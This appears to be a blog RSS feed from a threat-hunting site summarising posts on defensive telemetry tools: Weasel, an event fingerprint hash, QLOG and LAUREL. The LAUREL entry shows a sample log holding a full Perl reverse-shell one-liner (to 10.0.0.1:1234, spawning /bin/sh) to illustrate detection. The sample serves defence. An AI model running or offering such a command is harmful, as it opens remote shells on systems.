https://threathunters.io/blog/posts/Recent content in Posts on Threathunters.ioHugo -- gohugo.ioen-usWed, 20 Aug 2025 00:00:00 +0000https://threathunters.io/blog/posts/weasel_beta/Wed, 20 Aug 2025 00:00:00 +0000https://threathunters.io/blog/posts/weasel_beta/Most commercial sensors in the threat-hunting space are effective at data collection, but they often obscure critical details about how and under what conditions that data is captured. This lack of transparency makes sense from a vendor’s perspective—protecting intellectual property—but it leaves defenders with limited insight and little flexibility. With Weasel, we’re working toward closing that gap. The vision is to give engineers fine-grained control over collection logic, ensure data relevance, and provide the adaptability needed to handle enterprise-specific use cases and evolving threat landscapes.https://threathunters.io/blog/posts/ttp_hash/Thu, 30 Dec 2021 00:00:00 +0000https://threathunters.io/blog/posts/ttp_hash/The lack of a generally accepted method for calculating a telemetry event fingerprint to uniquely identify a specific event represents a gap in current telemetry collection practice. At present, the approach involves utilizing file hashes as a means to fingerprint observable entities, such as files. While file hashes serve as invaluable markers from the perspective of Indicators of Compromise (IOCs), their utility is restricted by their inability to furnish contextual insights regarding the event in question.https://threathunters.io/blog/posts/qlog/Wed, 29 Dec 2021 00:00:00 +0000https://threathunters.io/blog/posts/qlog/QLOG provides lightweigth userland logging of process create events on Windows written in C#. It’s under development and currently in experimental state. QLOG uses ETW to collect telemetry, it doesn’t use API hooks and it doesn’t require a driver to be installed on the target system, Currently QLOG supports “process create” events, but other enriched events may follow soon. QLOG runs as a Windows Services, but can also run in console mode, if you want to output to console directly.https://threathunters.io/blog/posts/intro_laurel/Sat, 25 Dec 2021 00:00:00 +0000https://threathunters.io/blog/posts/intro_laurel/LAUREL is an event post-processing plugin for auditd(8) to improve its usability in modern security monitoring setups. Why? Instead of audit events that look like this… type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742… …turn them into JSON logs where the mess that your pen testers/red teamers/attackers are trying to make becomes apparent at first glance: { [...] "EXECVE": { "argc": 3, "ARGV": [ "perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};" ] }, [...] } This happens at the source.